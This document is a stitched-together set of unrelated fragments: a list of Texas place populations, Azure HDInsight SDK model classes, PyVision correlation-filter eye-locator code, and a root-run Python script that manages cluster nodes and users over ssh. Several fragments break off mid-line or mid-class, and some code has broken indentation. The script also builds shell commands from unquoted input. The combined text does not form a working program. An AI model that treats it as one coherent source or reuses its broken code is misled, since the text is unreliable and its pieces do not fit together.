("Fritch city, Texas",2503),
("Fronton CDP, Texas",260),
("Fronton Ranchettes CDP, Texas",234),
("Frost city, Texas",755),
("Fruitvale city, Texas",479),
("Fulshear city, Texas",8014),
("Fulton town, Texas",1451),
("Gail CDP, Texas",245),
("Gainesville city, Texas",16275),
("Galena Park city, Texas",11075),
("Gallatin city, Texas",334),
("Galveston city, Texas",50039),
("Ganado city, Texas",2056),
("Garceno CDP, Texas",480),
("Garciasville CDP, Texas",72),
("Garden City CDP, Texas",487),
("Gardendale CDP, Texas",2031),
("Garden Ridge city, Texas",3887),
("Garfield CDP, Texas",1533),
("Garland city, Texas",237982),
("Garrett town, Texas",1062),
("Garrison city, Texas",1243),
("Gary City town, Texas",397),
("Garza-Salinas II CDP, Texas",570),
("Gatesville city, Texas",12387),
("Georgetown city, Texas",66804),
("George West | |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class Resource(Model):
    """The core properties of ARM resources.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Fully qualified resource Id for the resource.
    :vartype id: str
    :ivar name: The name of the resource
    :vartype name: str
    :ivar type: The type of the resource.
    :vartype type: str
    """

    # All three core fields are read-only strings serialized under the
    # same wire name as the attribute.
    _validation = {attr: {'readonly': True} for attr in ('id', 'name', 'type')}

    _attribute_map = {attr: {'key': attr, 'type': 'str'} for attr in ('id', 'name', 'type')}

    def __init__(self, **kwargs):
        super(Resource, self).__init__(**kwargs)
        # Server-populated fields start unset.
        for attr in ('id', 'name', 'type'):
            setattr(self, attr, None)
class ProxyResource(Resource):
    """The resource model definition for a ARM proxy resource: it carries
    everything other than the required location and tags.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Fully qualified resource Id for the resource.
    :vartype id: str
    :ivar name: The name of the resource
    :vartype name: str
    :ivar type: The type of the resource.
    :vartype type: str
    """

    _validation = {attr: {'readonly': True} for attr in ('id', 'name', 'type')}

    _attribute_map = {attr: {'key': attr, 'type': 'str'} for attr in ('id', 'name', 'type')}

    def __init__(self, **kwargs):
        # A proxy resource adds no fields of its own.
        super(ProxyResource, self).__init__(**kwargs)
class Application(ProxyResource):
    """The HDInsight cluster application.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Fully qualified resource Id for the resource.
    :vartype id: str
    :ivar name: The name of the resource
    :vartype name: str
    :ivar type: The type of the resource.
    :vartype type: str
    :param etag: The ETag for the application
    :type etag: str
    :param tags: The tags for the application.
    :type tags: dict[str, str]
    :param properties: The properties of the application.
    :type properties: ~azure.mgmt.hdinsight.models.ApplicationProperties
    """

    _validation = {attr: {'readonly': True} for attr in ('id', 'name', 'type')}

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'properties': {'key': 'properties', 'type': 'ApplicationProperties'},
    }

    def __init__(self, **kwargs):
        super(Application, self).__init__(**kwargs)
        # Caller-settable fields default to None when absent.
        self.etag = kwargs.get('etag')
        self.tags = kwargs.get('tags')
        self.properties = kwargs.get('properties')
class ApplicationGetEndpoint(Model):
    """Gets the application SSH endpoint.

    :param location: The location of the endpoint.
    :type location: str
    :param destination_port: The destination port to connect to.
    :type destination_port: int
    :param public_port: The public port to connect to.
    :type public_port: int
    """

    _attribute_map = {
        'location': {'key': 'location', 'type': 'str'},
        'destination_port': {'key': 'destinationPort', 'type': 'int'},
        'public_port': {'key': 'publicPort', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        super(ApplicationGetEndpoint, self).__init__(**kwargs)
        # Every field is optional; absent keys become None.
        for field in ('location', 'destination_port', 'public_port'):
            setattr(self, field, kwargs.get(field))
class ApplicationGetHttpsEndpoint(Model):
    """Gets the application HTTP endpoints.

    :param access_modes: The list of access modes for the application.
    :type access_modes: list[str]
    :param location: The location of the endpoint.
    :type location: str
    :param destination_port: The destination port to connect to.
    :type destination_port: int
    :param public_port: The public port to connect to.
    :type public_port: int
    :param sub_domain_suffix: The subdomain suffix of the application.
    :type sub_domain_suffix: str
    :param disable_gateway_auth: The value indicates whether to disable
     GatewayAuth.
    :type disable_gateway_auth: bool
    """

    _attribute_map = {
        'access_modes': {'key': 'accessModes', 'type': '[str]'},
        'location': {'key': 'location', 'type': 'str'},
        'destination_port': {'key': 'destinationPort', 'type': 'int'},
        'public_port': {'key': 'publicPort', 'type': 'int'},
        'sub_domain_suffix': {'key': 'subDomainSuffix', 'type': 'str'},
        'disable_gateway_auth': {'key': 'disableGatewayAuth', 'type': 'bool'},
    }

    def __init__(self, **kwargs):
        super(ApplicationGetHttpsEndpoint, self).__init__(**kwargs)
        # Every field is optional; absent keys become None.
        for field in ('access_modes', 'location', 'destination_port',
                      'public_port', 'sub_domain_suffix',
                      'disable_gateway_auth'):
            setattr(self, field, kwargs.get(field))
class ApplicationProperties(Model):
    """The HDInsight cluster application GET response.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :param compute_profile: The list of roles in the cluster.
    :type compute_profile: ~azure.mgmt.hdinsight.models.ComputeProfile
    :param install_script_actions: The list of install script actions.
    :type install_script_actions:
     list[~azure.mgmt.hdinsight.models.RuntimeScriptAction]
    :param uninstall_script_actions: The list of uninstall script actions.
    :type uninstall_script_actions:
     list[~azure.mgmt.hdinsight.models.RuntimeScriptAction]
    :param https_endpoints: The list of application HTTPS endpoints.
    :type https_endpoints:
     list[~azure.mgmt.hdinsight.models.ApplicationGetHttpsEndpoint]
    :param ssh_endpoints: The list of application SSH endpoints.
    :type ssh_endpoints:
     list[~azure.mgmt.hdinsight.models.ApplicationGetEndpoint]
    :ivar provisioning_state: The provisioning state of the application.
    :vartype provisioning_state: str
    :param application_type: The application type.
    :type application_type: str
    :ivar application_state: The application state.
    :vartype application_state: str
    :param errors: The list of errors.
    :type errors: list[~azure.mgmt.hdinsight.models.Errors]
    :ivar created_date: The application create date time.
    :vartype created_date: str
    :ivar marketplace_identifier: The marketplace identifier.
    :vartype marketplace_identifier: str
    """

    _validation = {attr: {'readonly': True}
                   for attr in ('provisioning_state', 'application_state',
                                'created_date', 'marketplace_identifier')}

    _attribute_map = {
        'compute_profile': {'key': 'computeProfile', 'type': 'ComputeProfile'},
        'install_script_actions': {'key': 'installScriptActions', 'type': '[RuntimeScriptAction]'},
        'uninstall_script_actions': {'key': 'uninstallScriptActions', 'type': '[RuntimeScriptAction]'},
        'https_endpoints': {'key': 'httpsEndpoints', 'type': '[ApplicationGetHttpsEndpoint]'},
        'ssh_endpoints': {'key': 'sshEndpoints', 'type': '[ApplicationGetEndpoint]'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'application_type': {'key': 'applicationType', 'type': 'str'},
        'application_state': {'key': 'applicationState', 'type': 'str'},
        'errors': {'key': 'errors', 'type': '[Errors]'},
        'created_date': {'key': 'createdDate', 'type': 'str'},
        'marketplace_identifier': {'key': 'marketplaceIdentifier', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationProperties, self).__init__(**kwargs)
        # Caller-settable fields come from kwargs (None when absent).
        for field in ('compute_profile', 'install_script_actions',
                      'uninstall_script_actions', 'https_endpoints',
                      'ssh_endpoints', 'application_type', 'errors'):
            setattr(self, field, kwargs.get(field))
        # Read-only fields are populated only by the server.
        for field in ('provisioning_state', 'application_state',
                      'created_date', 'marketplace_identifier'):
            setattr(self, field, None)
class Autoscale(Model):
    """The autoscale request parameters.

    :param capacity: Parameters for load-based autoscale
    :type capacity: ~azure.mgmt.hdinsight.models.AutoscaleCapacity
    :param recurrence: Parameters for schedule-based autoscale
    :type recurrence: ~azure.mgmt.hdinsight.models.AutoscaleRecurrence
    """

    # Maps attribute names to their wire keys and (de)serialization types.
    _attribute_map = {
        'capacity': {'key': 'capacity', 'type': 'AutoscaleCapacity'},
        'recurrence': {'key': 'recurrence', 'type': 'AutoscaleRecurrence'},
    }

    def __init__(self, **kwargs):
        """Build the model from optional keyword arguments."""
        super(Autoscale, self).__init__(**kwargs)
        # Absent keywords default to None.
        self.capacity = kwargs.get('capacity')
        self.recurrence = kwargs.get('recurrence')
class AutoscaleCapacity(Model):
    """The load-based autoscale request parameters.

    :param min_instance_count: The minimum instance count of the cluster
    :type min_instance_count: int
    :param max_instance_count: The maximum instance count of the cluster
    :type max_instance_count: int
    """

    # Maps attribute names to their wire keys and (de)serialization types.
    _attribute_map = {
        'min_instance_count': {'key': 'minInstanceCount', 'type': 'int'},
        'max_instance_count': {'key': 'maxInstanceCount', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        """Build the model from optional keyword arguments."""
        super(AutoscaleCapacity, self).__init__(**kwargs)
        # Absent keywords default to None.
        self.min_instance_count = kwargs.get('min_instance_count')
        self.max_instance_count = kwargs.get('max_instance_count')
class AutoscaleRecurrence(Model):
    """Schedule-based autoscale request parameters.

    :param time_zone: The time zone for the autoscale schedule times
    :type time_zone: str
    :param schedule: Array of schedule-based autoscale rules
    :type schedule: list[~azure.mgmt.hdinsight.models.AutoscaleSchedule]
    """

    # Maps attribute names to their wire keys and (de)serialization types.
    _attribute_map = {
        'time_zone': {'key': 'timeZone', 'type': 'str'},
        'schedule': {'key': 'schedule', 'type': '[AutoscaleSchedule]'},
    }

    def __init__(self, **kwargs):
        """Build the model from optional keyword arguments."""
        super(AutoscaleRecurrence, self).__init__(**kwargs)
        # Absent keywords default to None.
        self.time_zone = kwargs.get('time_zone')
        self.schedule = kwargs.get('schedule')
class AutoscaleSchedule(Model):
    """Parameters for a schedule-based autoscale rule: an array of days
    plus a time and capacity.

    :param days: Days of the week for a schedule-based autoscale rule
    :type days: list[str or ~azure.mgmt.hdinsight.models.DaysOfWeek]
    :param time_and_capacity: Time and capacity for a schedule-based
        autoscale rule
    :type time_and_capacity:
        ~azure.mgmt.hdinsight.models.AutoscaleTimeAndCapacity
    """

    # Maps attribute names to their wire keys and (de)serialization types.
    _attribute_map = {
        'days': {'key': 'days', 'type': '[DaysOfWeek]'},
        'time_and_capacity': {'key': 'timeAndCapacity', 'type': 'AutoscaleTimeAndCapacity'},
    }

    def __init__(self, **kwargs):
        """Build the model from optional keyword arguments."""
        super(AutoscaleSchedule, self).__init__(**kwargs)
        # Absent keywords default to None.
        self.days = kwargs.get('days')
        self.time_and_capacity = kwargs.get('time_and_capacity')
class AutoscaleTimeAndCapacity(Model):
    """Time and capacity request parameters.

    :param time: 24-hour time in the form xx:xx
    :type time: str
    :param min_instance_count: The minimum instance count of the cluster
    :type min_instance_count: int
    :param max_instance_count: The maximum instance count of the cluster
    :type max_instance_count: int
    """

    # Maps attribute names to their wire keys and (de)serialization types.
    _attribute_map = {
        'time': {'key': 'time', 'type': 'str'},
        'min_instance_count': {'key': 'minInstanceCount', 'type': 'int'},
        'max_instance_count': {'key': 'maxInstanceCount', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        """Build the model from optional keyword arguments."""
        super(AutoscaleTimeAndCapacity, self).__init__(**kwargs)
        # Absent keywords default to None.
        self.time = kwargs.get('time')
        self.min_instance_count = kwargs.get('min_instance_count')
        self.max_instance_count = kwargs.get('max_instance_count')
class BillingMeters(Model):
    """The billing meters.

    :param meter_parameter: The virtual machine sizes.
    :type meter_parameter: str
    :param meter: The HDInsight meter guid.
    :type meter: str
    :param unit: The unit of meter, VMHours or CoreHours.
    :type unit: str
    """

    # Maps attribute names to their wire keys and (de)serialization types.
    _attribute_map = {
        'meter_parameter': {'key': 'meterParameter', 'type': 'str'},
        'meter': {'key': 'meter', 'type': 'str'},
        'unit': {'key': 'unit', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        """Build the model from optional keyword arguments."""
        super(BillingMeters, self).__init__(**kwargs)
        # Absent keywords default to None.
        self.meter_parameter = kwargs.get('meter_parameter')
        self.meter = kwargs.get('meter')
        self.unit = kwargs.get('unit')
class BillingResources(Model):
"""The billing resources.
:param region: The region or location.
:type region: str
:param billing_meters: The billing meter | |
# PyVision License
#
# Copyright (c) 2006-2008 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
This is a simplified correlation filter implementation used to locate eyes
using ASEF correlation filters. This file contains two classes:
OpenCVFilterEyeLocator and FilterEyeLocator. The first is the bare minimum
required to locate eyes and only requires OpenCV. The second is a wrapper
that provides a nice PyVision-compatible interface. The first class is not
integrated with PyVision; PyVision supplies an interface to it which cleans
up the interface and provides a bridge to many of the PyVision data
structures.
'''
import cv
import math
import struct
import array
import os.path
import pyvision as pv
import numpy as np
import sys
__author__ = "<NAME> - Colorado State Univeristy"
__version__ = "$Revision: 729 $"
# Emit a one-time notice at import time when PyVision is configured to
# flag possibly patent-encumbered code (ASEF filters).
if pv.WARN_COMMERCIAL_USE:
    warning = '''
    WARNING: A patent protection is anticipated for ASEF and
    similar filters by the Colorado State University
    Research Foundation (CSURF).
    This module, "FilterEyeLocator.py", my not be
    suitable for commercial use.
    Commercial and government users should contact
    CSURF for additional details:
    http://www.csurf.org/tto/pdfs/ncs_forms/09-017_csurf_ncs.pdf
    '''
    sys.stderr.write(warning)
#TODO: Unknown error - This may be related version 1.0.0 of opencv
#Traceback (most recent call last):
# File "/home/dbolme/ASEFFilters/python/csu/tools/face_scan.py", line 117, in ?
# results = processFaces(im,face_detect,locate_eyes)
# File "/home/dbolme/ASEFFilters/python/csu/tools/face_scan.py", line 57, in processFaces
# eye1, eye2, corr1, corr2 = locate_eyes.locateEyes(cv_im)
# File "/home/dbolme/ASEFFilters/python/csu/face/FilterEyeLocator.py", line 185, in locateEyes
# leye = cv.cvMinMaxLoc(self.left_roi)[3]
#IndexError: list index out of range
#TODO: Add a quality estimate
def saveFilterEyeLocator(filename, el, comment="", copyright=""):
    '''
    Save a correlation-filter eye locator to a CFEL file.

    File Format
    - Line 1: CFEL
    - Line 2: <comment>
    - Line 3: <copyright>
    - Line 4: ROWS COLS
    - Line 5: LEFT_RECT
    - Line 6: RIGHT_RECT
    - Line 7: BYTE_ORDER(0x41424344 or 'ABCD')
    - Line 8: <binary data: two single precision floating point arrays of 4*WIDTH*HEIGHT bytes)

    @param filename: path of the file to write.
    @param el: eye locator holding left/right filters (cv matrices) and
        left/right search rectangles.
    @param comment: free-text comment stored on line 2.
    @param copyright: copyright notice stored on line 3.
    '''
    r,c = el.left_filter.rows,el.left_filter.cols
    # Use a context manager so the file is closed even if a write fails
    # (the previous implementation never closed the handle).
    with open(filename,'wb') as f:
        f.write("CFEL\n")
        f.write(comment.strip()+"\n")
        f.write(copyright.strip()+"\n")
        f.write("%d %d\n"%(r,c))
        f.write("%d %d %d %d\n"%(el.left_rect.x,el.left_rect.y,el.left_rect.width,el.left_rect.height))
        f.write("%d %d %d %d\n"%(el.right_rect.x,el.right_rect.y,el.right_rect.width,el.right_rect.height))
        # Magic number recording the byte order the arrays were written in.
        f.write("%s\n"%struct.pack("i",0x41424344))
        # Each filter is a 32-bit float matrix: 4 bytes per element.
        assert len(el.left_filter.imageData) == 4*r*c
        f.write(el.left_filter.imageData)
        assert len(el.right_filter.imageData) == 4*r*c
        f.write(el.right_filter.imageData)
def loadFilterEyeLocator(filename,ilog=None):
    '''
    Load an eye locator from a CFEL file (see saveFilterEyeLocator for the
    file format).

    @param filename: path of the CFEL file to read.
    @param ilog: optional image log; when given, fft-shifted views of the
        two filters are logged for inspection.
    @returns: an OpenCVFilterEyeLocator built from the file contents.
    @raises ValueError: if the byte-order magic number is unrecognized.
    '''
    # Read everything inside a context manager so the handle is closed
    # even on a parse error (the previous implementation leaked it).
    with open(filename,'rb') as f:
        # Check the first line
        line = f.readline().strip()
        assert line == "CFEL"
        # read past the comment and copyright.
        f.readline()
        f.readline()
        # get the width and the height
        r,c = f.readline().split()
        r,c = int(r),int(c)
        # read in the left bounding rectangle
        x,y,w,h = f.readline().split()
        left_rect = (int(x),int(y),int(w),int(h))
        # read in the right bounding rectangle
        x,y,w,h = f.readline().split()
        right_rect = (int(x),int(y),int(w),int(h))
        # read the magic number
        magic_number = f.readline().strip()
        assert len(magic_number) == 4
        magic_number = struct.unpack('i',magic_number)[0]
        # Read in the raw float32 filter data
        lf = array.array('f')
        rf = array.array('f')
        lf.fromfile(f,r*c)
        rf.fromfile(f,r*c)
    # Test the magic number and byteswap if necessary.
    if magic_number == 0x41424344:
        pass
    elif magic_number == 0x44434241:
        lf.byteswap()
        rf.byteswap()
    else:
        raise ValueError("Bad Magic Number: Unknown byte ordering in file")
    # Create the left and right filters
    left_filter = cv.CreateMat(r,c,cv.CV_32F)
    right_filter = cv.CreateMat(r,c,cv.CV_32F)
    # Copy data into the left and right filters
    cv.SetData(left_filter, lf.tostring())
    cv.SetData(right_filter, rf.tostring())
    # Normalize each filter to zero mean and unit standard deviation.
    tmp = pv.OpenCVToNumpy(left_filter)
    t1 = tmp.mean()
    t2 = tmp.std()
    cv.Scale(left_filter,left_filter,1.0/t2,-t1*1.0/t2)
    tmp = pv.OpenCVToNumpy(right_filter)
    t1 = tmp.mean()
    t2 = tmp.std()
    cv.Scale(right_filter,right_filter,1.0/t2,-t1*1.0/t2)
    if ilog != None:
        # Log human-viewable versions of the filters (fft-shifted so the
        # filter center appears at the image center).
        lf = pv.OpenCVToNumpy(left_filter)
        rf = pv.OpenCVToNumpy(right_filter)
        lf = np.fft.fftshift(lf).transpose()
        rf = np.fft.fftshift(rf).transpose()
        ilog.log(pv.Image(lf),label="LeftEyeFilter")
        ilog.log(pv.Image(rf),label="RightEyeFilter")
    # Return the eye locator
    return OpenCVFilterEyeLocator(left_filter,right_filter,left_rect,right_rect)
class OpenCVFilterEyeLocator:
'''
This class is used for someone only interested in locating the eyes in an
image using correlation filters. This class does not include any support
for training correlation filters. For training see ASEF. This class
is written only using OpenCV and is much faster than the ASEF class.
For details see the paper:
<NAME>, <NAME>, and <NAME>. Average of
Synthetic Exact Filters. Submitted to Computer Vision and Pattern
Recoginition. 2009.
    The class uses two ASEF filters to find the eyes. The eyes are located by
    first computing the correlation of the face tile with each filter. The
    location of the maximum value in the correlation plane is returned as the
    eye coordinate. Also returned is the full correlation output for the image.
    The images are normalized by log transforming the pixel values.
    To improve performance, this class is not thread safe: the class reuses
    data arrays allocated for each call. To use this class from multiple
    threads, you should create an instance for each thread. Also note that
    each method call may overwrite arrays returned by an earlier call, so if
    you need the returned data to persist be sure to create a copy.
- Left and right eyes are in relation to the location in the image.
'''
    def __init__(self,left_filter,right_filter, left_rect, right_rect):
        '''
        Allocate the reusable work buffers and precompute the filter DFTs.

        @param left_filter: single-channel filter for the left eye; it is
            converted to the Fourier domain internally (the code applies
            cv.DFT to it, so the input is expected in the spatial domain).
        @param right_filter: single-channel filter for the right eye; must
            match left_filter in width and height.
        @param left_rect: rectangle of the correlation output that is
            searched for the left eye maximum.
        @param right_rect: rectangle of the correlation output that is
            searched for the right eye maximum.
        '''
        # Check the input to this function
        r,c = left_filter.rows,left_filter.cols
        assert left_filter.width == right_filter.width
        assert left_filter.height == right_filter.height
        assert left_filter.channels == 1
        assert right_filter.channels == 1
        # Create the arrays needed for the computation. These buffers are
        # reused on every call, which is why instances are not thread safe
        # (see the class docstring).
        self.left_filter = cv.CreateMat(r,c,cv.CV_32F)
        self.right_filter = cv.CreateMat(r,c,cv.CV_32F)
        self.left_filter_dft = cv.CreateMat(r,c,cv.CV_32F)
        self.right_filter_dft = cv.CreateMat(r,c,cv.CV_32F)
        self.image = cv.CreateMat(r,c,cv.CV_32F)
        self.left_corr = cv.CreateMat(r,c,cv.CV_32F)
        self.right_corr = cv.CreateMat(r,c,cv.CV_32F)
        # Populate the spatial filters
        cv.ConvertScale(left_filter, self.left_filter)
        cv.ConvertScale(right_filter, self.right_filter)
        # Compute the filters in the Fourier domain (once, at construction)
        cv.DFT(self.left_filter, self.left_filter_dft, cv.CV_DXT_FORWARD)
        cv.DFT(self.right_filter, self.right_filter_dft, cv.CV_DXT_FORWARD)
        # Set up correlation regions of interest: eye maxima are only
        # searched for within these sub-rectangles.
        self.left_rect = left_rect
        self.right_rect = right_rect
        self.left_roi = cv.GetSubRect(self.left_corr,self.left_rect)
        self.right_roi = cv.GetSubRect(self.right_corr,self.right_rect)
        # Create the look up table for the log transform: i -> log(i + 1)
        self.lut = cv.CreateMat(256,1,cv.CV_32F)
        for i in range(256):
            self.lut[i,0] = math.log(i+1)
    def locateEyes(self,image_tile):
        '''
        Locate the left and right eyes in a face tile.

        @param image_tile: a gray scale opencv image tile of a face
            that is the same size as the filter
        @type image_tile: 8-bit gray scale opencv image (the original
            docstring also said "32-bit" -- the exact expected depth
            should be confirmed against correlate/_preprocess)
        @returns: a tuple consisting of the location of the left and right
            eyes (opencv 2D points), and the left and right correlation
            plane outputs
        @raises AssertionError: is raised if the image is not the expected
            depth or not the same size as the filter
        '''
        # Fill self.left_corr / self.right_corr with correlation output.
        self.correlate(image_tile)
        # MinMaxLoc returns (min_val, max_val, min_loc, max_loc); index 3
        # is the location of the maximum response within the search ROI.
        leye = cv.MinMaxLoc(self.left_roi)[3]
        # Translate from ROI-relative coordinates to tile coordinates.
        leye = (self.left_rect[0]+leye[0],self.left_rect[1]+leye[1])
        reye = cv.MinMaxLoc(self.right_roi)[3]
        reye = (self.right_rect[0]+reye[0],self.right_rect[1]+reye[1])
        return leye,reye,self.left_corr,self.right_corr
    def _preprocess(self,image_tile):
        '''
        Preprocess an image tile by log transforming its pixel values.

        @param image_tile: opencv image tile to preprocess.
        @returns: a float32 opencv image holding log(pixel + 1); the result
            is stored on (and overwrites) self.image, which is reused
            across calls.
        '''
        # TODO: This function has problems in opencv 2.2. There appears to be a bug.
        # Round-trip through numpy to apply the log transform, then convert
        # back to an opencv image.
        image_tile = pv.OpenCVToNumpy(image_tile)
        self.image = pv.NumpyToOpenCV(np.log(image_tile + 1.0).astype(np.float32))
        return self.image
def correlate(self,image_tile):
'''
Correlate the image with the left and | |
#!/usr/bin/python3
import subprocess, sys, os, time, getpass
# Make sure the script is being run as root (it creates/removes system
# users and reconfigures interfaces).
whoami = getpass.getuser()
if whoami != 'root':
    print('This script must be run as root')
    sys.exit()
# Head node hostname; should be resolvable via hosts file
HEAD_NODE = "yourhostname"
# Directory where you archive old users home dirs: NO TRAILING SLASH
archivedir = "/home/archive"
# Min/Max UID & GID's: ranges scanned when allocating new ids
# (see getNextUID / getNextGID).
GID_MIN = 2000
GID_MAX = 4000
UID_MIN = 2000
UID_MAX = 3000
# Project groups are allocated from the upper part of the GID range.
PROJECT_GID_MIN = 3000
# Interface that nodes use for external connection.
# I leave these turned off unless needed. This script will bring up/take down external interfaces
EXTERNAL_INTERFACE = "ethX"
# The menu shown on each iteration of the main loop below.
menu = """
Welcome to the Grid Management Tool
This script helps you perform some common tasks on the nodes via ssh remote execute.
What would you like to do?
1. Update/Upgrade Nodes
2. Install a package from apt on Nodes
3. Execute an R Script on Nodes(The script must specify a CRAN mirror)
4. Add a system user to all nodes (including head node)
5. Completely Remove a System User
6. Add a group
7. Remove a group
8. Add existing user to a supplementary group
9. Execute an arbitrary command on all nodes
10. Restart Ganglia Monitor on all nodes
11. Reboot the Nodes
0. Quit.
"""
# Execute a command on each node
def execute(command):
    """Run *command* on every compute node over ssh, printing failures.

    NOTE(review): the node name is interpolated into a shell pipeline for
    the getent lookup; names come from `qconf -sel` (semi-trusted), but
    quoting would still be safer.
    """
    for node in nodes:
        print(f"Executing '{command}' on {node}")
        # Resolve the node's IP address from the hosts database.
        lookup = f"getent hosts {node} | cut -d' ' -f1"
        ip = subprocess.check_output(lookup, shell=True).decode('ascii').strip()
        # Run the command remotely, capturing both output streams.
        result = subprocess.run(["ssh", ip, command], stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        if result.returncode != 0:
            print(f"Failed to execute on {node} \nERROR\n{result.stderr}")
def execute_arb(command):
    """Run *command* on every compute node over ssh, echoing each response.

    Identical to execute() except that successful output is printed too.
    """
    for node in nodes:
        print(f"Executing '{command}' on {node}")
        # Resolve the node's IP address from the hosts database.
        lookup = f"getent hosts {node} | cut -d' ' -f1"
        ip = subprocess.check_output(lookup, shell=True).decode('ascii').strip()
        result = subprocess.run(["ssh", ip, command], stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        if result.returncode != 0:
            print(f"Failed to execute on {node} \nERROR\n{result.stderr}")
        else:
            print(f"Response: {result.stdout}")
# Bring up the external interfaces
def ifup():
    """Bring up the external interface on every node and report its IP."""
    for node in nodes:
        # Resolve the node name to an IP via the hosts database.
        ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
        proc = subprocess.Popen(["ssh", "%s" % ip, "ifup %s" % EXTERNAL_INTERFACE], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = proc.communicate()
        if proc.returncode != 0:
            print("Failed to execute on %s! \nERROR\n%s" % (node, err))
        else:
            # Interface came up; query its IPv4 address to confirm/display.
            command = "ifconfig %s | grep 'inet addr' | cut -d':' -f2 | cut -d' ' -f1" % EXTERNAL_INTERFACE
            proc = subprocess.Popen(["ssh", "%s" % ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            out, err = proc.communicate()
            if proc.returncode != 0:
                print("Failed to execute on %s \nERROR\n%s" % (ip, err))
            else:
                print("%s %s up, ip: %s" % (node, EXTERNAL_INTERFACE, out.decode('ascii').strip()))
# Take down the external interfaces
def ifdown():
    """Take down the external interface on every compute node."""
    for node in nodes:
        # Resolve the node's IP address from the hosts database.
        lookup = f"getent hosts {node} | cut -d' ' -f1"
        ip = subprocess.check_output(lookup, shell=True).decode('ascii').strip()
        result = subprocess.run(["ssh", ip, f"ifdown {EXTERNAL_INTERFACE}"],
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if result.returncode != 0:
            print(f"Failed to execute on {node}! \nERROR\n{result.stderr}")
        else:
            print(f"{node}: {EXTERNAL_INTERFACE} down")
# Add a system user and set the password expiration
def addSystemUser(fullname, username, uid, gid):
    """
    Create a system account on the head node and every compute node.

    The home directory is only created on the head node (-m); compute
    nodes get the same /home path without creating it (presumably home
    storage is shared or pre-existing -- TODO confirm).

    NOTE(review): fullname/username are interpolated directly into shell
    command lines; a value containing quotes would break (or inject into)
    the command.

    @param fullname: GECOS full name for the account.
    @param username: login name.
    @param uid: numeric user id to assign on every host.
    @param gid: numeric primary group id.
    """
    print("Adding %s to %s" % (fullname, HEAD_NODE))
    os.system("useradd -m -d /home/%s -u %s -g %s -c '%s' -s /bin/bash %s" % (username, uid, gid, fullname, username))
    # Password expires after 180 days, 14-day warning, 5-day inactivity lock.
    os.system("chage -M 180 -I 5 -W 14 %s" % username)
    for node in nodes:
        print("Adding user %s to %s" % (fullname, node))
        ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
        command = "useradd -d /home/%s -u %s -g %s -c '%s' -s /bin/bash %s && chage -M 180 -I 5 -W 14 %s" % (username, uid, gid, fullname, username, username)
        proc = subprocess.Popen(["ssh", ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = proc.communicate()
        if proc.returncode != 0:
            print("Failed to execute on %s! \nERROR\n%s" % (node, err))
# Remove a system user and optionally archive the home directory before removing it
def removeSystemUser(username, archivedir):
    """
    Remove *username* from the head node and all compute nodes.

    If *archivedir* is non-empty, the user's home directory is first
    archived there as <archivedir>/<username>-<timestamp>.tar.gz.

    @param username: account name to delete.
    @param archivedir: archive directory path ("" disables archiving).
    """
    # Archive the user's home directory before deleting it.
    if archivedir != "":
        # Anchor the grep to the username field: the original unanchored
        # 'grep %s /etc/passwd' could match a substring of another user's
        # name (or any other passwd field) and archive the wrong home dir.
        homedir = subprocess.check_output(["grep '^%s:' /etc/passwd | cut -f6 -d:" % username], shell=True).decode('ascii').strip()
        print("%s's Home Directory: %s" % (username, homedir))
        archive = "%s/%s-%s" % (archivedir, username, time.strftime("%Y%m%d-%H%M%S"))
